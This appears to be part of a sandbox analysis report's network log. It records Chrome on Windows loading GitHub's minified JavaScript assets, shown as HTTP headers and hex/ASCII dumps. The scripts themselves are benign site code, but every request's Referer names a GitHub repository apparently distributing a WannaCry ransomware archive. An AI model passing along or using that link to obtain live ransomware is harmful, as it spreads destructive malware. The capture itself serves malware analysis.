                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 65 72 22 3d 3d 74 79 70 65 6f 66 20 69 2e 68 65 69 67 68 74 26 26 28 6f 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 60 24 7b 69 2e 68 65 69 67 68 74 7d 70 78 60 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 63 6f 64 65 5f 72 65 6e 64 65 72 69 6e 67 5f 73 65 72 76 69 63 65 3a 63 6f 6e 74 61 69 6e 65 72 3a 67 65 74 5f 73 69 7a 65 22 3a 68 28 73 2c 7b 74 79 70 65 3a 22 72 65 6e 64 65 72 3a 63 6d 64 22 2c 62 6f 64 79 3a 7b 63 6d 64 3a 22 63 6f 64 65 5f 72 65 6e 64 65 72 69 6e 67 5f 73 65 72 76 69 63 65 3a 63 6f 6e 74 61 69 6e 65 72 3a 73 69 7a 65 22 2c 22 63 6f 64 65 5f 72 65 6e 64 65 72 69 6e 67 5f 73 65 72 76 69 63 65 3a 63 6f 6e 74 61 69 6e 65 72 3a 73 69 7a 65 22 3a 7b 77 69 64 74 68 3a 6f 3f 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29
                                                                                      Data Ascii: er"==typeof i.height&&(o.style.height=`${i.height}px`);break;case"code_rendering_service:container:get_size":h(s,{type:"render:cmd",body:{cmd:"code_rendering_service:container:size","code_rendering_service:container:size":{width:o?.getBoundingClientRect()
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 63 6f 6c 6f 72 2d 6d 6f 64 65 5d 22 29 3b 69 66 28 74 29 72 65 74 75 72 6e 20 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 60 64 61 74 61 2d 24 7b 65 7d 2d 74 68 65 6d 65 60 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 3d 22 6c 69 67 68 74 22 29 7b 6c 65 74 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 5d 22 29 3b 69 66 28 65 29 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 22 29 7d 28 29 3b 72 65 74 75 72 6e 28 22 61 75 74 6f 22 3d 3d 3d 74 3f 69 28 29 3a 74 29 3f 3f 65 7d 28 61 73 79 6e 63 28 29 3d 3e 7b 69 66 28 61 77 61 69 74 20 6e 2e 78 2c 6f
                                                                                      Data Ascii: color-mode]");if(t)return t.getAttribute(`data-${e}-theme`)}function u(e="light"){let t=function(){let e=document.querySelector("html[data-color-mode]");if(e)return e.getAttribute("data-color-mode")}();return("auto"===t?i():t)??e}(async()=>{if(await n.x,o


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      40192.168.2.1649744185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC736OUTGET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-9285faa0e011.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 12005
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 22 Feb 2024 16:53:07 GMT
                                                                                      ETag: 0x8DC33C6BE7816FA
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 2069400
                                                                                      X-Served-By: cache-iad-kiad7000028-IAD, cache-ewr18122-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 574, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: f148631d83a699152f153b2cc84bfcb550319dc4
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 22 5d 2c 7b 32 31 31 34 34 3a 28 65 2c 74 2c 73 29 3d 3e 7b 73 2e 64 28 74 2c 7b 7a 3a 28 29 3d 3e 79 7d 29 3b 76 61 72 20 6e 3d 73 28 35 39 37 35 33 29 2c 69 3d 73 28 38 35 32 35 39 29 2c 6f 3d 73 28 31 32 30 34 30 29 2c 72 3d 73 28 33 34
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235"],{21144:(e,t,s)=>{s.d(t,{z:()=>y});var n=s(59753),i=s(85259),o=s(12040),r=s(34
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 64 64 65 6e 3d 74 29 7d 28 30 2c 6d 2e 4e 37 29 28 22 2e 6a 73 2d 63 6f 6d 6d 65 6e 74 2d 68 65 61 64 65 72 2d 61 63 74 69 6f 6e 73 2d 64 65 66 65 72 72 65 64 2d 69 6e 63 6c 75 64 65 2d 66 72 61 67 6d 65 6e 74 22 2c 7b 73 75 62 73 63 72 69 62 65 3a 65 3d 3e 28 30 2c 6c 2e 52 42 29 28 65 2c 22 6c 6f 61 64 73 74 61 72 74 22 2c 28 29 3d 3e 7b 6c 65 74 20 74 3d 65 2e 63 6c 6f 73 65 73 74 28 22 2e 6a 73 2d 63 6f 6d 6d 65 6e 74 22 29 3b 67 28 74 29 7d 2c 7b 63 61 70 74 75 72 65 3a 21 31 2c 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 28 30 2c 6d 2e 4e 37 29 28 22 2e 6a 73 2d 63 6f 6d 6d 65 6e 74 20 2e 63 6f 6e 74 61 69 6e 73 2d 74 61 73 6b 2d 6c 69 73 74 22 2c 7b 61 64 64 3a 65 3d 3e 7b 6c 65 74 20 74 3d 65 2e 63 6c 6f 73 65 73 74 28 22 2e 6a 73 2d 63 6f 6d 6d 65 6e 74
                                                                                      Data Ascii: dden=t)}(0,m.N7)(".js-comment-header-actions-deferred-include-fragment",{subscribe:e=>(0,l.RB)(e,"loadstart",()=>{let t=e.closest(".js-comment");g(t)},{capture:!1,once:!0})}),(0,m.N7)(".js-comment .contains-task-list",{add:e=>{let t=e.closest(".js-comment
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 73 4c 69 73 74 2e 61 64 64 28 22 69 73 2d 63 6f 6d 6d 65 6e 74 2d 6c 6f 61 64 69 6e 67 22 29 3b 6c 65 74 20 69 3d 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 62 6f 64 79 2d 76 65 72 73 69 6f 6e 22 29 3b 69 26 26 73 2e 68 65 61 64 65 72 73 2e 73 65 74 28 22 58 2d 42 6f 64 79 2d 56 65 72 73 69 6f 6e 22 2c 69 29 7d 29 2c 28 30 2c 63 2e 41 43 29 28 22 2e 6a 73 2d 63 6f 6d 6d 65 6e 74 20 2e 6a 73 2d 63 6f 6d 6d 65 6e 74 2d 75 70 64 61 74 65 22 2c 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 73 3b 6c 65 74 20 6e 3d 65 2e 63 6c 6f 73 65 73 74 28 22 2e 6a 73 2d 63 6f 6d 6d 65 6e 74 22 29 2c 6f 3d 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 63 6f 6d 6d 65 6e 74 2d 75 70 64 61 74 65 2d 65 72 72 6f 72
                                                                                      Data Ascii: sList.add("is-comment-loading");let i=n.getAttribute("data-body-version");i&&s.headers.set("X-Body-Version",i)}),(0,c.AC)(".js-comment .js-comment-update",async function(e,t){let s;let n=e.closest(".js-comment"),o=n.querySelector(".js-comment-update-error
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 61 67 65 26 26 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 6d 65 72 67 65 2d 70 72 2e 69 73 2d 73 71 75 61 73 68 69 6e 67 22 29 29 7b 6c 65 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 6d 65 72 67 65 2d 70 75 6c 6c 2d 72 65 71 75 65 73 74 20 74 65 78 74 61 72 65 61 22 29 3b 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 54 65 78 74 41 72 65 61 45 6c 65 6d 65 6e 74 26 26 65 2e 76 61 6c 75 65 3d 3d 3d 65 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 26 26 28 65 2e 76 61 6c 75 65 3d 65 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 3d 6d 2e 64 65 66 61 75 6c 74 5f 73 71 75 61 73 68 5f 63 6f 6d 6d 69 74 5f 6d 65 73 73 61 67 65 29 7d 7d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53
                                                                                      Data Ascii: age&&document.querySelector(".js-merge-pr.is-squashing")){let e=document.querySelector(".js-merge-pull-request textarea");e instanceof HTMLTextAreaElement&&e.value===e.defaultValue&&(e.value=e.defaultValue=m.default_squash_commit_message)}}document.queryS
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 29 7d 63 61 74 63 68 28 65 29 7b 7d 65 26 26 65 2e 73 74 61 6c 65 26 26 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 69 73 2d 63 6f 6d 6d 65 6e 74 2d 73 74 61 6c 65 22 29 7d 65 6c 73 65 20 74 68 72 6f 77 20 73 7d 66 69 6e 61 6c 6c 79 7b 65 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 73 75 62 6d 69 74 3a 63 6f 6d 70 6c 65 74 65 22 2c 7b 62 75 62 62 6c 65 73 3a 21 30 2c 64 65 74 61 69 6c 3a 7b 65 72 72 6f 72 3a 73 7d 7d 29 29 7d 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 69 73 2d 63 6f 6d 6d 65 6e 74 2d 6c 6f 61 64 69 6e 67 22 29 7d 29 2c 28 30 2c 63 2e 41 43 29 28 22 2e 6a 73 2d 74 69 6d 65 6c 69 6e 65 2d 63 6f 6d 6d 65 6e 74 2d 75 6e 6d 69 6e
                                                                                      Data Ascii: response.text)}catch(e){}e&&e.stale&&n.classList.add("is-comment-stale")}else throw s}finally{e.dispatchEvent(new CustomEvent("submit:complete",{bubbles:!0,detail:{error:s}}))}n.classList.remove("is-comment-loading")}),(0,c.AC)(".js-timeline-comment-unmin
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 65 6c 65 74 65 64 22 29 29 65 2e 72 65 6d 6f 76 65 28 29 7d 29 2c 28 30 2c 63 2e 41 43 29 28 22 2e 6a 73 2d 69 73 73 75 65 2d 75 70 64 61 74 65 22 2c 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 73 3b 6c 65 74 20 6e 3d 65 2e 63 6c 6f 73 65 73 74 28 22 2e 6a 73 2d 64 65 74 61 69 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 22 29 2c 69 3d 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 65 72 72 6f 72 22 29 3b 74 72 79 7b 73 3d 61 77 61 69 74 20 74 2e 6a 73 6f 6e 28 29 7d 63 61 74 63 68 28 65 29 7b 69 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 65 2e 72 65 73 70 6f 6e 73 65 3f 2e 6a 73 6f 6e 3f 2e 65 72 72 6f 72 73 3f 2e 5b 30 5d 7c 7c 22 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f
                                                                                      Data Ascii: eleted"))e.remove()}),(0,c.AC)(".js-issue-update",async function(e,t){let s;let n=e.closest(".js-details-container"),i=n.querySelector(".js-comment-form-error");try{s=await t.json()}catch(e){i.textContent=e.response?.json?.errors?.[0]||"Something went wro
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 74 20 74 2e 6a 73 6f 6e 28 29 3b 6c 65 74 20 73 3d 65 2e 63 6c 6f 73 65 73 74 28 22 2e 6a 73 2d 63 6f 6d 6d 65 6e 74 22 29 2c 6e 3d 73 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 6d 69 6e 69 6d 69 7a 65 2d 63 6f 6d 6d 65 6e 74 22 29 3b 69 66 28 6e 26 26 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 6a 73 2d 75 70 64 61 74 65 2d 6d 69 6e 69 6d 69 7a 65 64 2d 63 6f 6e 74 65 6e 74 22 29 29 7b 6c 65 74 20 74 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 20 62 75 74 74 6f 6e 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 22 29 3b 74 26 26 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 64 69 73 61 62 6c 65 64 22 29 3b 6c 65 74 20 6e 3d 73 2e 63 6c 6f 73 65 73 74 28
                                                                                      Data Ascii: t t.json();let s=e.closest(".js-comment"),n=s.querySelector(".js-minimize-comment");if(n&&n.classList.contains("js-update-minimized-content")){let t=e.querySelector("input[type=submit], button[type=submit]");t&&t.classList.add("disabled");let n=s.closest(
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 65 3a 22 43 6f 75 6c 64 6e 27 74 20 64 69 73 70 6c 61 79 20 65 64 69 74 20 68 69 73 74 6f 72 79 20 64 69 66 66 22 7d 29 7d 2c 7b 63 61 70 74 75 72 65 3a 21 30 7d 29 7d 2c 34 36 31 36 3a 28 65 2c 74 2c 73 29 3d 3e 7b 73 2e 64 28 74 2c 7b 47 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 6e 3d 73 28 39 32 33 38 29 2c 69 3d 73 28 33 36 30 37 31 29 2c 6f 3d 73 28 35 39 37 35 33 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 6c 65 74 20 74 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 72 65 71 75 69 72 65 64 2d 76 61 6c 75 65 22 29 2c 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 72 65 71 75 69 72 65 64 2d 76 61 6c 75 65 2d 70 72 65 66 69 78 22 29 3b 69 66 28 65 2e 76 61 6c 75 65 3d 3d 3d 74 29 65 2e 73 65 74 43 75 73 74 6f
                                                                                      Data Ascii: e:"Couldn't display edit history diff"})},{capture:!0})},4616:(e,t,s)=>{s.d(t,{G:()=>a});var n=s(9238),i=s(36071),o=s(59753);function r(e){let t=e.getAttribute("data-required-value"),s=e.getAttribute("data-required-value-prefix");if(e.value===t)e.setCusto
                                                                                      2024-03-23 14:47:23 UTC981INData Raw: 69 64 5d 22 29 29 73 2e 64 69 73 61 62 6c 65 64 3d 21 74 7d 28 30 2c 69 2e 4e 37 29 28 22 62 75 74 74 6f 6e 5b 64 61 74 61 2d 64 69 73 61 62 6c 65 2d 69 6e 76 61 6c 69 64 5d 22 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 48 54 4d 4c 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 2c 69 6e 69 74 69 61 6c 69 7a 65 28 65 29 7b 6c 65 74 20 74 3d 65 2e 66 6f 72 6d 3b 74 26 26 28 6c 2e 67 65 74 28 74 29 7c 7c 28 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 68 61 6e 67 65 22 2c 28 29 3d 3e 61 28 74 29 29 2c 6c 2e 73 65 74 28 74 2c 21 30 29 29 2c 65 2e 64 69 73 61 62 6c 65 64 3d 21 74 2e 63 68 65 63 6b 56 61 6c 69 64 69 74 79 28 29 29 7d 7d 29 2c 28 30 2c 69 2e 4e 37 29 28 22 69 6e 70 75 74 5b 64 61 74 61 2d 72 65 71 75 69 72 65 64 2d 63 68 61 6e 67 65 5d
                                                                                      Data Ascii: id]"))s.disabled=!t}(0,i.N7)("button[data-disable-invalid]",{constructor:HTMLButtonElement,initialize(e){let t=e.form;t&&(l.get(t)||(t.addEventListener("change",()=>a(t)),l.set(t,!0)),e.disabled=!t.checkValidity())}}),(0,i.N7)("input[data-required-change]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      41192.168.2.1649745185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC645OUTGET /assets/behaviors-4e25e265ef84.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 235961
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 21 Mar 2024 19:18:28 GMT
                                                                                      ETag: 0x8DC49DBB01BA0B6
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 75616
                                                                                      X-Served-By: cache-iad-kjyo7100132-IAD, cache-ewr18133-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 43, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 88eceb03cea164a8c071c0cf234c461a9ce291d5
                                                                                      2024-03-23 14:47:23 UTC16384INData Raw: 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 62 65 68 61 76 69 6f 72 73 22 5d 2c 7b 31 39 33 37 30 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 65 74 20 72 2c 69 2c 61 2c 6f 2c 73 2c 6c 2c 63 2c 75 2c 64 3b 76 61 72 20 6d 2c 66 2c 68 2c 70 2c 67 2c 62 2c 79 2c 76 3d 6e 28 35 38 33 35 33 29 2c 77 3d 6e 28 35 39 37 35 33 29 3b 28 30 2c 77 2e 6f 6e 29 28 22 64 65 70 72 65 63 61 74 65 64 41 6a 61 78 53 65 6e 64 22 2c 22 5b 64 61 74 61 2d 72 65 6d 6f 74 65 5d 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 21 3d 3d 65 2e 74 61 72 67 65 74 7c 7c 65 2e 64
                                                                                      Data Ascii: (globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["behaviors"],{19370:(e,t,n)=>{"use strict";let r,i,a,o,s,l,c,u,d;var m,f,h,p,g,b,y,v=n(58353),w=n(59753);(0,w.on)("deprecatedAjaxSend","[data-remote]",function(e){e.currentTarget!==e.target||e.d
                                                                                      2024-03-23 14:47:24 UTC16384INData Raw: 67 65 74 28 65 29 3b 74 3f 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 29 3a 65 68 28 65 29 2c 65 70 2e 73 65 74 28 65 2c 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 65 66 2c 32 65 33 2c 65 29 29 7d 29 3b 76 61 72 20 65 67 3d 6e 28 36 35 38 30 39 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 65 62 28 65 2c 74 2c 6e 2c 72 2c 69 29 7b 6c 65 74 20 61 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 74 61 67 73 65 61 72 63 68 2d 75 72 6c 22 29 3b 69 66 28 21 61 29 72 65 74 75 72 6e 22 22 3b 6c 65 74 20 6f 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 74 61 67 73 65 61 72 63 68 2d 72 65 66 22 29 3b 69 66 28 21 6f 29 72 65 74 75 72 6e 22 22 3b 6c 65 74 20 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64
                                                                                      Data Ascii: get(e);t?clearTimeout(t):eh(e),ep.set(e,window.setTimeout(ef,2e3,e))});var eg=n(65809);async function eb(e,t,n,r,i){let a=e.getAttribute("data-tagsearch-url");if(!a)return"";let o=e.getAttribute("data-tagsearch-ref");if(!o)return"";let s=e.getAttribute("d
                                                                                      2024-03-23 14:47:24 UTC16384INData Raw: 2e 61 70 70 65 6e 64 28 22 62 61 73 65 5f 63 6f 6d 6d 69 74 5f 6f 69 64 22 2c 63 29 2c 75 26 26 64 2e 61 70 70 65 6e 64 28 22 63 6f 6d 6d 65 6e 74 5f 69 64 22 2c 75 29 2c 64 7d 28 65 29 3b 72 65 74 75 72 6e 28 30 2c 77 2e 66 29 28 65 2c 22 70 72 65 76 69 65 77 3a 73 65 74 75 70 22 2c 7b 64 61 74 61 3a 6e 7d 29 2c 65 51 28 74 2c 6e 29 7d 28 30 2c 77 2e 6f 6e 29 28 22 63 6c 69 63 6b 22 2c 22 2e 6a 73 2d 77 72 69 74 65 2d 74 61 62 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2c 6e 3d 74 2e 63 6c 6f 73 65 73 74 28 22 2e 6a 73 2d 70 72 65 76 69 65 77 61 62 6c 65 2d 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 22 29 3b 69 66 28 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 47 2e 5a 29 7b 73 65 74 54 69 6d 65 6f 75
                                                                                      Data Ascii: .append("base_commit_oid",c),u&&d.append("comment_id",u),d}(e);return(0,w.f)(e,"preview:setup",{data:n}),eQ(t,n)}(0,w.on)("click",".js-write-tab",function(e){let t=e.currentTarget,n=t.closest(".js-previewable-comment-form");if(n instanceof eG.Z){setTimeou
                                                                                      2024-03-23 14:47:24 UTC16384INData Raw: 74 61 74 65 3a 22 69 73 2d 62 61 64 2d 64 69 6d 65 6e 73 69 6f 6e 73 22 7d 3b 63 61 73 65 22 6e 61 6d 65 22 3a 69 66 28 22 61 6c 72 65 61 64 79 5f 65 78 69 73 74 73 22 3d 3d 3d 65 2e 63 6f 64 65 29 72 65 74 75 72 6e 7b 73 74 61 74 65 3a 22 69 73 2d 64 75 70 6c 69 63 61 74 65 2d 66 69 6c 65 6e 61 6d 65 22 7d 3b 72 65 74 75 72 6e 7b 73 74 61 74 65 3a 22 69 73 2d 62 61 64 2d 66 69 6c 65 22 7d 3b 63 61 73 65 22 63 6f 6e 74 65 6e 74 5f 74 79 70 65 22 3a 72 65 74 75 72 6e 7b 73 74 61 74 65 3a 22 69 73 2d 62 61 64 2d 66 69 6c 65 22 7d 3b 63 61 73 65 22 75 70 6c 6f 61 64 65 72 5f 69 64 22 3a 72 65 74 75 72 6e 7b 73 74 61 74 65 3a 22 69 73 2d 62 61 64 2d 70 65 72 6d 69 73 73 69 6f 6e 73 22 7d 3b 63 61 73 65 22 72 65 70 6f 73 69 74 6f 72 79 5f 69 64 22 3a 72 65 74
                                                                                      Data Ascii: tate:"is-bad-dimensions"};case"name":if("already_exists"===e.code)return{state:"is-duplicate-filename"};return{state:"is-bad-file"};case"content_type":return{state:"is-bad-file"};case"uploader_id":return{state:"is-bad-permissions"};case"repository_id":ret
                                                                                      2024-03-23 14:47:24 UTC16384INData Raw: 20 72 3d 6e 2e 6c 65 6e 67 74 68 3e 30 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 64 61 74 61 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 2d 74 65 78 74 5d 22 29 29 7b 6c 65 74 20 65 3d 6e 2e 74 65 78 74 43 6f 6e 74 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 74 72 69 6d 28 29 3b 69 66 28 65 3d 3d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 28 65 2c 6e 29 3b 69 66 28 65 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 69 73 2d 73 68 6f 77 69 6e 67 2d 6e 65 77 2d 69 74 65 6d 2d 66 6f 72 6d 22 2c 72 29 2c 21 72 29 72 65 74 75 72 6e 3b 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72
                                                                                      Data Ascii: r=n.length>0&&!function(e,t){for(let n of e.querySelectorAll("[data-menu-button-text]")){let e=n.textContent.toLowerCase().trim();if(e===t.toLowerCase())return!0}return!1}(e,n);if(e.classList.toggle("is-showing-new-item-form",r),!r)return;t.querySelector
